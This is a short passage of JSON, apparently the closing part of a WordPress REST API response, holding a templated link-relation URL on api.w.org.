":"https:\/\/api.w.org\/{rel}","templated":true}]}}